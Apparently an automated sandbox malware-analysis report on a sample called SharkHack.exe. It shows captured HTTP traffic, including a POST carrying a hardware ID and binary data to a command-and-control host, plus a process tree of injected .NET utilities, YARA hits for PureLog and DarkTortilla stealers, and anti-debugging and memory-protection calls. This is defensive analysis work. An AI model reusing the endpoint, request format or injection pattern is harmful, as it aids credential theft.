                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=3s536105slej2q2tsa23g51lfn; expires=Fri, 25 Apr 2025 11:33:41 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6GXG0OsyOTPN%2FZp8sHh2qJ70pgTnO4hAjtlDFO8179ZmHoLBnm7%2Fh%2FFIgpNEjSRcsh2r7tNjTXOUduRuos4Qc%2BCbDwdsLi21SfiIPXa4OMNfdmGQRFp8G67mS0RpIGBg0Mo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8fa3da4a8867c35d-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=59481&min_rtt=1594&rtt_var=34884&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=945&delivery_rate=1831869&cwnd=183&unsent_bytes=0&cid=64d2381820c6f91c&ts=483&x=0"
                                                                                                        2024-12-30 17:47:02 UTC241INData Raw: 31 63 61 36 0d 0a 73 4f 65 35 59 76 52 6e 62 50 48 55 55 58 4c 61 6a 6b 39 31 34 37 4c 61 64 37 71 62 62 73 65 45 77 42 4d 4b 47 52 45 69 71 49 4c 4c 78 63 39 41 7a 6c 4e 41 30 36 63 30 55 4f 44 36 50 51 43 47 6e 76 67 57 33 72 6c 55 6f 65 57 73 59 47 38 31 4d 31 54 46 6f 49 71 42 32 41 36 48 41 6b 44 54 73 53 6c 51 34 4e 55 30 56 34 62 63 2b 45 32 59 2f 67 53 6c 35 61 78 78 61 33 4a 2b 55 73 54 68 32 49 76 65 43 70 45 45 43 4a 43 34 50 42 65 2f 36 79 34 66 6a 64 75 33 48 39 65 35 51 75 58 68 75 6a 45 77 4f 31 78 48 33 4f 50 39 68 73 6f 4a 31 68 70 41 69 76 59 30 48 50 69 30 62 52 53 47 30 4c 59 52 33 76 41 47 72 2b 79 6b 63 47 35 7a 59 55 76 4f 36 74 69 46 33 51 75 62 44 52 79 64 73 6a 73 63 75 65 45 75 56 38 2b
                                                                                                        Data Ascii: 1ca6sOe5YvRnbPHUUXLajk9147Lad7qbbseEwBMKGREiqILLxc9AzlNA06c0UOD6PQCGnvgW3rlUoeWsYG81M1TFoIqB2A6HAkDTsSlQ4NU0V4bc+E2Y/gSl5axxa3J+UsTh2IveCpEECJC4PBe/6y4fjdu3H9e5QuXhujEwO1xH3OP9hsoJ1hpAivY0HPi0bRSG0LYR3vAGr+ykcG5zYUvO6tiF3QubDRydsjscueEuV8+
                                                                                                        2024-12-30 17:47:02 UTC1369INData Raw: 51 76 77 32 59 6f 55 7a 32 31 4b 46 67 65 57 35 2b 55 4d 79 67 7a 63 76 43 51 4a 45 4a 54 73 76 32 4f 78 79 32 36 53 34 59 68 74 47 34 42 39 66 35 44 36 33 75 70 6e 74 6e 64 48 78 4f 77 4f 66 61 6a 4e 77 50 6b 51 30 49 6e 4c 56 7a 58 76 6a 72 4e 56 66 5a 6b 4a 67 46 32 2f 6f 59 71 50 66 69 62 69 5a 69 4d 30 66 47 6f 49 72 46 33 51 36 58 43 41 36 42 76 6a 67 62 76 66 34 6d 48 6f 7a 64 75 42 6a 53 39 67 2b 6c 34 61 68 37 5a 33 46 33 54 63 66 6d 30 6f 57 62 54 74 59 43 46 74 50 75 63 7a 4f 39 2f 43 6f 62 6c 35 4b 43 56 63 65 33 46 65 58 68 72 6a 45 77 4f 33 74 46 79 65 50 5a 69 74 67 49 6e 52 63 4f 67 62 41 2b 46 61 72 71 4b 42 6d 4c 30 36 6f 66 31 76 38 50 72 4f 32 72 64 47 39 2f 4d 77 36 4b 35 38 72 46 67 30 43 33 43 41 57 66 76 43 51 51 2b 50 4e 6a 44 73
                                                                                                        Data Ascii: Qvw2YoUz21KFgeW5+UMygzcvCQJEJTsv2Oxy26S4YhtG4B9f5D63upntndHxOwOfajNwPkQ0InLVzXvjrNVfZkJgF2/oYqPfibiZiM0fGoIrF3Q6XCA6Bvjgbvf4mHozduBjS9g+l4ah7Z3F3Tcfm0oWbTtYCFtPuczO9/Cobl5KCVce3FeXhrjEwO3tFyePZitgInRcOgbA+FarqKBmL06of1v8PrO2rdG9/Mw6K58rFg0C3CAWfvCQQ+PNjDs
                                                                                                        2024-12-30 17:47:02 UTC1369INData Raw: 30 76 38 44 71 4f 72 69 50 79 68 38 61 77 43 53 6f 50 69 47 7a 77 4f 63 52 7a 75 51 75 44 30 58 72 71 77 79 57 5a 69 51 76 78 6d 59 6f 55 79 6f 35 36 70 33 65 6e 52 2b 51 38 54 75 33 59 44 55 43 4a 59 46 41 35 61 79 4f 42 75 37 34 53 6b 46 69 39 43 77 45 4e 6e 7a 42 75 57 6f 34 6e 5a 77 4f 79 73 41 2b 2f 66 5a 78 2b 34 44 6d 41 73 4a 68 66 59 73 58 71 47 73 4b 68 76 42 69 50 67 59 30 50 77 4a 71 75 65 6f 66 32 31 78 66 30 6a 45 34 38 43 4b 33 77 43 61 44 51 53 65 75 44 63 59 73 65 63 6d 45 59 48 52 73 6c 57 57 75 51 75 39 70 76 6f 78 58 48 78 2f 54 63 57 69 35 34 62 56 44 70 45 54 54 6f 7a 34 4b 6c 43 2f 34 47 31 50 77 64 79 78 46 64 50 7a 43 4b 58 68 72 33 52 72 66 48 42 4e 7a 65 72 63 67 74 38 4d 6e 77 67 49 6b 37 45 33 46 61 72 70 4a 42 75 4e 6b 50 5a
                                                                                                        Data Ascii: 0v8DqOriPyh8awCSoPiGzwOcRzuQuD0XrqwyWZiQvxmYoUyo56p3enR+Q8Tu3YDUCJYFA5ayOBu74SkFi9CwENnzBuWo4nZwOysA+/fZx+4DmAsJhfYsXqGsKhvBiPgY0PwJqueof21xf0jE48CK3wCaDQSeuDcYsecmEYHRslWWuQu9pvoxXHx/TcWi54bVDpETToz4KlC/4G1PwdyxFdPzCKXhr3RrfHBNzercgt8MnwgIk7E3FarpJBuNkPZ
                                                                                                        2024-12-30 17:47:02 UTC1369INData Raw: 2b 76 2f 34 6e 5a 6b 4f 79 73 41 77 2b 6e 41 69 39 55 4a 6d 77 4d 47 6c 4c 67 2b 47 37 37 6e 4b 68 43 48 33 62 41 59 33 66 6f 4e 6f 65 79 77 63 6d 4e 78 66 6b 71 4b 72 70 4b 43 77 30 44 4f 52 53 6d 66 6e 79 4d 4c 71 76 70 74 43 4d 2f 4a 2b 42 4c 55 75 56 54 6c 35 61 31 34 5a 33 4e 37 54 38 58 6b 33 49 50 64 44 5a 4d 4b 42 49 47 2b 50 52 32 7a 34 79 59 46 67 64 32 38 47 64 7a 78 42 36 2b 6d 37 44 46 76 59 7a 4d 59 69 74 58 66 69 74 73 44 67 45 55 52 33 61 39 7a 46 37 53 73 64 56 65 4e 33 72 67 61 31 50 55 48 72 65 65 75 66 32 39 2b 65 6b 6a 43 38 74 4f 42 30 77 47 59 43 67 2b 58 73 7a 59 55 76 2b 67 72 47 4d 47 65 2b 42 4c 41 75 56 54 6c 79 59 56 45 4b 6c 70 4a 41 4e 57 75 79 38 58 63 44 4e 5a 64 54 70 2b 31 50 78 69 33 36 69 51 62 69 39 6d 7a 47 64 50 39
                                                                                                        Data Ascii: +v/4nZkOysAw+nAi9UJmwMGlLg+G77nKhCH3bAY3foNoeywcmNxfkqKrpKCw0DORSmfnyMLqvptCM/J+BLUuVTl5a14Z3N7T8Xk3IPdDZMKBIG+PR2z4yYFgd28GdzxB6+m7DFvYzMYitXfitsDgEUR3a9zF7SsdVeN3rga1PUHreeuf29+ekjC8tOB0wGYCg+XszYUv+grGMGe+BLAuVTlyYVEKlpJANWuy8XcDNZdTp+1Pxi36iQbi9mzGdP9
                                                                                                        2024-12-30 17:47:02 UTC1369INData Raw: 64 2b 61 58 70 31 55 73 33 70 77 49 76 57 44 35 34 4e 42 35 4b 79 4e 68 32 2b 34 43 63 57 68 74 36 32 48 5a 69 33 54 4b 4c 2b 34 69 6b 6f 57 6d 4e 62 32 50 62 66 70 4e 59 50 31 68 70 41 69 76 59 30 48 50 69 30 62 52 36 54 31 4c 55 48 30 66 34 43 71 75 57 77 63 47 56 77 59 55 66 46 35 4e 57 4a 33 51 2b 51 42 41 75 5a 75 6a 51 56 73 2b 4d 68 56 38 2b 51 76 77 32 59 6f 55 79 4c 37 62 46 6d 61 33 56 34 56 74 47 67 7a 63 76 43 51 4a 45 4a 54 73 76 32 4d 42 75 7a 36 43 30 62 67 64 53 31 46 63 72 32 43 36 4c 76 71 57 4e 69 66 48 52 4c 77 75 76 64 67 38 6b 4d 6d 42 63 4c 67 61 52 7a 58 76 6a 72 4e 56 66 5a 6b 49 34 53 79 4f 6b 50 35 39 65 30 63 6e 35 77 66 6b 79 4b 2f 35 79 63 6d 77 65 61 52 56 62 54 73 44 77 5a 75 2b 4d 73 48 6f 33 64 76 52 7a 64 2b 41 71 68 37
                                                                                                        Data Ascii: d+aXp1Us3pwIvWD54NB5KyNh2+4CcWht62HZi3TKL+4ikoWmNb2PbfpNYP1hpAivY0HPi0bR6T1LUH0f4CquWwcGVwYUfF5NWJ3Q+QBAuZujQVs+MhV8+Qvw2YoUyL7bFma3V4VtGgzcvCQJEJTsv2MBuz6C0bgdS1Fcr2C6LvqWNifHRLwuvdg8kMmBcLgaRzXvjrNVfZkI4SyOkP59e0cn5wfkyK/5ycmweaRVbTsDwZu+MsHo3dvRzd+Aqh7
                                                                                                        2024-12-30 17:47:02 UTC1369INData Raw: 67 4d 31 2b 45 2b 5a 4b 43 31 30 44 4f 52 51 32 55 74 54 49 61 73 65 41 69 45 49 58 43 73 68 4c 4b 2b 41 32 75 36 36 35 78 5a 58 5a 35 51 63 50 74 33 6f 6a 63 42 35 6b 41 54 74 33 32 4e 41 6a 34 74 47 30 32 6a 4e 75 30 54 6f 4b 35 45 2b 76 2f 34 6e 5a 6b 4f 79 73 41 79 75 72 58 6a 39 59 44 6d 51 59 63 6b 72 41 68 45 4c 58 6d 50 78 32 4b 31 62 55 59 31 66 6f 4b 6f 2b 32 75 59 32 46 37 63 45 75 4b 72 70 4b 43 77 30 44 4f 52 53 32 45 6f 44 6b 58 74 50 6f 6d 46 6f 4c 47 74 51 57 59 74 30 79 30 34 62 4d 78 4d 47 31 6a 56 38 33 2f 6e 4a 79 62 42 35 70 46 56 74 4f 77 4f 68 61 2f 36 69 4d 46 68 4e 61 33 47 74 48 77 43 4b 33 6c 6f 6e 56 73 66 48 5a 44 78 75 76 56 68 74 51 45 6e 77 73 48 6e 50 5a 39 55 4c 2f 30 62 55 2f 42 38 61 4d 57 31 50 52 4d 75 71 69 37 4d 57
                                                                                                        Data Ascii: gM1+E+ZKC10DORQ2UtTIaseAiEIXCshLK+A2u665xZXZ5QcPt3ojcB5kATt32NAj4tG02jNu0ToK5E+v/4nZkOysAyurXj9YDmQYckrAhELXmPx2K1bUY1foKo+2uY2F7cEuKrpKCw0DORS2EoDkXtPomFoLGtQWYt0y04bMxMG1jV83/nJybB5pFVtOwOha/6iMFhNa3GtHwCK3lonVsfHZDxuvVhtQEnwsHnPZ9UL/0bU/B8aMW1PRMuqi7MW
                                                                                                        2024-12-30 17:47:02 UTC256INData Raw: 30 71 43 4b 78 66 73 4c 67 41 41 4a 68 66 51 47 45 37 62 69 4b 67 48 42 7a 34 64 62 6d 50 59 57 35 62 36 62 61 43 68 38 66 77 43 53 6f 4d 65 43 32 77 65 4d 45 77 6d 66 70 7a 67 64 74 4d 34 69 45 4a 66 54 74 78 62 4a 38 45 43 75 36 2b 49 2f 4b 48 78 72 41 4a 4b 67 2f 59 4c 4e 41 37 6b 47 48 35 72 32 66 56 43 2f 2b 6d 31 50 77 65 37 34 42 39 76 70 44 36 72 33 6e 44 45 77 59 6b 30 41 77 66 62 56 6c 64 67 57 6e 51 67 43 67 6f 68 7a 53 4f 79 2b 66 30 58 54 67 71 64 56 78 38 5a 43 35 65 66 69 4b 56 46 69 4d 31 61 4b 75 49 44 4c 6d 78 4c 57 58 55 37 55 74 53 45 43 76 75 38 37 46 4d 62 75 68 6a 4c 4f 38 77 75 31 34 62 56 2b 4b 44 55 7a 54 34 71 34 36 38 58 53 42 34 30 55 47 4a 36 6d 4e 46 43 48 6f 6d 30 50 77 59 6a 34 49 4e 76 33 41 71 4c 77 73 7a 78 50 62 58 0d
                                                                                                        Data Ascii: 0qCKxfsLgAAJhfQGE7biKgHBz4dbmPYW5b6baCh8fwCSoMeC2weMEwmfpzgdtM4iEJfTtxbJ8ECu6+I/KHxrAJKg/YLNA7kGH5r2fVC/+m1Pwe74B9vpD6r3nDEwYk0AwfbVldgWnQgCgohzSOy+f0XTgqdVx8ZC5efiKVFiM1aKuIDLmxLWXU7UtSECvu87FMbuhjLO8wu14bV+KDUzT4q468XSB40UGJ6mNFCHom0PwYj4INv3AqLwszxPbX
                                                                                                        2024-12-30 17:47:02 UTC1369INData Raw: 32 63 65 65 0d 0a 6c 48 32 75 66 46 69 70 74 4f 31 67 4e 4f 79 2b 56 39 55 4c 7a 39 62 55 2f 52 67 75 4e 41 69 36 35 63 39 2f 6e 73 61 43 68 74 4d 78 69 59 72 70 4b 58 6d 31 6a 57 51 67 32 42 70 44 55 54 72 75 39 71 4b 62 2f 33 6f 68 6a 65 37 68 32 62 32 4b 56 72 5a 58 31 6b 55 59 62 31 30 59 76 56 42 34 42 46 51 4e 4f 35 63 30 69 42 72 47 56 58 76 70 37 34 44 5a 69 68 54 4a 44 6c 72 48 39 76 62 57 49 4e 37 66 72 66 67 38 77 52 31 6b 74 4f 6c 66 5a 72 51 76 61 73 4b 51 62 42 69 4f 68 48 67 36 78 66 38 72 62 77 62 69 5a 69 4d 31 61 4b 75 49 44 4c 6d 78 4c 57 58 55 37 55 74 53 45 43 76 75 38 37 46 4d 62 75 68 6a 76 66 2f 77 6d 69 39 75 42 66 59 32 39 30 41 49 53 67 33 63 57 44 4f 64 5a 4e 54 71 7a 34 63 77 6a 34 74 47 30 69 67 74 36 32 45 73 37 6f 51 59 76
                                                                                                        Data Ascii: 2ceelH2ufFiptO1gNOy+V9ULz9bU/RguNAi65c9/nsaChtMxiYrpKXm1jWQg2BpDUTru9qKb/3ohje7h2b2KVrZX1kUYb10YvVB4BFQNO5c0iBrGVXvp74DZihTJDlrH9vbWIN7frfg8wR1ktOlfZrQvasKQbBiOhHg6xf8rbwbiZiM1aKuIDLmxLWXU7UtSECvu87FMbuhjvf/wmi9uBfY290AISg3cWDOdZNTqz4cwj4tG0igt62Es7oQYv
                                                                                                        2024-12-30 17:47:02 UTC1369INData Raw: 43 6b 39 41 4e 69 67 69 73 57 63 41 34 51 58 43 4a 43 67 4d 46 65 47 30 67 6f 5a 68 74 47 75 42 63 2f 32 4d 70 76 7a 6f 58 39 6d 66 47 56 52 69 71 36 53 69 70 74 59 72 30 56 47 30 34 6c 39 55 4b 43 73 64 56 65 30 30 37 59 62 33 2b 38 64 36 4d 47 73 64 6d 6c 74 59 31 66 46 6f 4a 7a 46 33 55 44 4f 56 30 44 54 73 69 4a 51 34 4c 78 2f 54 4e 53 44 37 30 57 4b 35 6b 4b 38 70 72 51 78 4d 43 6b 39 41 4e 69 67 69 73 57 63 41 34 51 58 43 4a 43 67 4d 46 65 47 30 67 6f 5a 68 74 47 75 42 63 2f 32 51 34 76 51 67 30 39 57 62 6e 42 4f 78 4f 66 45 6c 4a 74 4f 31 67 70 4f 79 34 39 7a 57 50 6a 54 59 31 65 5a 6b 4f 42 56 37 66 6f 43 71 2b 47 30 59 43 56 63 66 55 66 4c 39 73 4b 53 31 45 2b 34 4d 79 2f 54 2b 48 4d 57 2b 4c 52 2f 57 63 48 55 71 56 57 41 71 56 37 2b 73 2f 45 6d
                                                                                                        Data Ascii: Ck9ANigisWcA4QXCJCgMFeG0goZhtGuBc/2MpvzoX9mfGVRiq6SiptYr0VG04l9UKCsdVe007Yb3+8d6MGsdmltY1fFoJzF3UDOV0DTsiJQ4Lx/TNSD70WK5kK8prQxMCk9ANigisWcA4QXCJCgMFeG0goZhtGuBc/2Q4vQg09WbnBOxOfElJtO1gpOy49zWPjTY1eZkOBV7foCq+G0YCVcfUfL9sKS1E+4My/T+HMW+LR/WcHUqVWAqV7+s/Em


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        2192.168.2.450015104.21.64.143443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 17:47:03 UTC275OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=9WGSI9MA6J92
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 18126
                                                                                                        Host: aliveindu.click
                                                                                                        2024-12-30 17:47:03 UTC15331OUTData Raw: 2d 2d 39 57 47 53 49 39 4d 41 36 4a 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 43 43 33 46 38 46 45 45 33 45 30 38 31 39 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 39 57 47 53 49 39 4d 41 36 4a 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 57 47 53 49 39 4d 41 36 4a 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 46 63 47 68 36 2d 2d 32 39 31 32 0d 0a 2d 2d 39 57 47 53 49 39 4d 41 36 4a 39 32 0d 0a 43
                                                                                                        Data Ascii: --9WGSI9MA6J92Content-Disposition: form-data; name="hwid"DACC3F8FEE3E081920A4C476FD51BCB1--9WGSI9MA6J92Content-Disposition: form-data; name="pid"2--9WGSI9MA6J92Content-Disposition: form-data; name="lid"bFcGh6--2912--9WGSI9MA6J92C
                                                                                                        2024-12-30 17:47:03 UTC2795OUTData Raw: a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be
                                                                                                        Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm


                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:0
                                                                                                        Start time:12:44:56
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Users\user\Desktop\SharkHack.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\SharkHack.exe"
                                                                                                        Imagebase:0xf00000
                                                                                                        File size:7'181'824 bytes
                                                                                                        MD5 hash:AF8F4B24943A56C36283C58AF92A66D2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2881426397.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2875564569.0000000004C2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2875564569.0000000004999000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2875564569.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2860912420.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:5
                                                                                                        Start time:12:45:43
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                        Imagebase:0x2b0000
                                                                                                        File size:42'064 bytes
                                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:6
                                                                                                        Start time:12:45:46
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                        Imagebase:0x4d0000
                                                                                                        File size:42'064 bytes
                                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:7
                                                                                                        Start time:12:45:49
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                        Imagebase:0xfc0000
                                                                                                        File size:42'064 bytes
                                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000007.00000002.2915403945.00000000044E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000007.00000002.2915403945.000000000443A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000007.00000002.2903541486.0000000003311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:9
                                                                                                        Start time:12:46:22
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                        Imagebase:0xff0000
                                                                                                        File size:42'064 bytes
                                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2923724922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:10
                                                                                                        Start time:12:46:27
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                        Imagebase:0xe60000
                                                                                                        File size:43'008 bytes
                                                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:moderate
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:13
                                                                                                        Start time:12:46:56
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6744 -s 984
                                                                                                        Imagebase:0xa40000
                                                                                                        File size:483'680 bytes
                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Disassembly

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:27.7%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:5.5%
                                                                                                          Total number of Nodes:164
                                                                                                          Total number of Limit Nodes:10
                                                                                                          execution_graph 60703 6020940 60704 6020984 CheckRemoteDebuggerPresent 60703->60704 60705 60209c6 60704->60705 60528 59d3398 60529 59d33d8 ResumeThread 60528->60529 60531 59d3409 60529->60531 60589 59d4ab8 60590 59d4c43 60589->60590 60592 59d4ade 60589->60592 60592->60590 60593 59d20d8 60592->60593 60594 59d4d38 PostMessageW 60593->60594 60595 59d4da4 60594->60595 60595->60592 60596 8a0e908 60597 8a0e91c 60596->60597 60598 8a0e995 60597->60598 60607 89c850f 60597->60607 60612 89c6ad3 60597->60612 60617 89c6c85 60597->60617 60622 89c7765 60597->60622 60627 89c75d4 60597->60627 60632 89c6d89 60597->60632 60638 89c6de8 60597->60638 60644 89c757f 60597->60644 60649 89c8adf 60607->60649 60653 89c8a30 60607->60653 60656 89c8a28 60607->60656 60608 89c8520 60614 89c8adf VirtualProtect 60612->60614 60615 89c8a28 VirtualProtect 60612->60615 60616 89c8a30 VirtualProtect 60612->60616 60613 89c6ae4 60614->60613 60615->60613 60616->60613 60619 89c8adf VirtualProtect 60617->60619 60620 89c8a28 VirtualProtect 60617->60620 60621 89c8a30 VirtualProtect 60617->60621 60618 89c6ca9 60619->60618 60620->60618 60621->60618 60624 89c8adf VirtualProtect 60622->60624 60625 89c8a28 VirtualProtect 60622->60625 60626 89c8a30 VirtualProtect 60622->60626 60623 89c777f 60624->60623 60625->60623 60626->60623 60629 89c8adf VirtualProtect 60627->60629 60630 89c8a28 VirtualProtect 60627->60630 60631 89c8a30 VirtualProtect 60627->60631 60628 89c7612 60629->60628 60630->60628 60631->60628 60633 89c6d7e 60632->60633 60633->60632 60635 89c8adf VirtualProtect 60633->60635 60636 89c8a28 VirtualProtect 60633->60636 60637 89c8a30 VirtualProtect 60633->60637 60634 89c6dfb 60635->60634 60636->60634 60637->60634 60639 89c6df1 60638->60639 60641 89c8adf VirtualProtect 60639->60641 60642 89c8a28 VirtualProtect 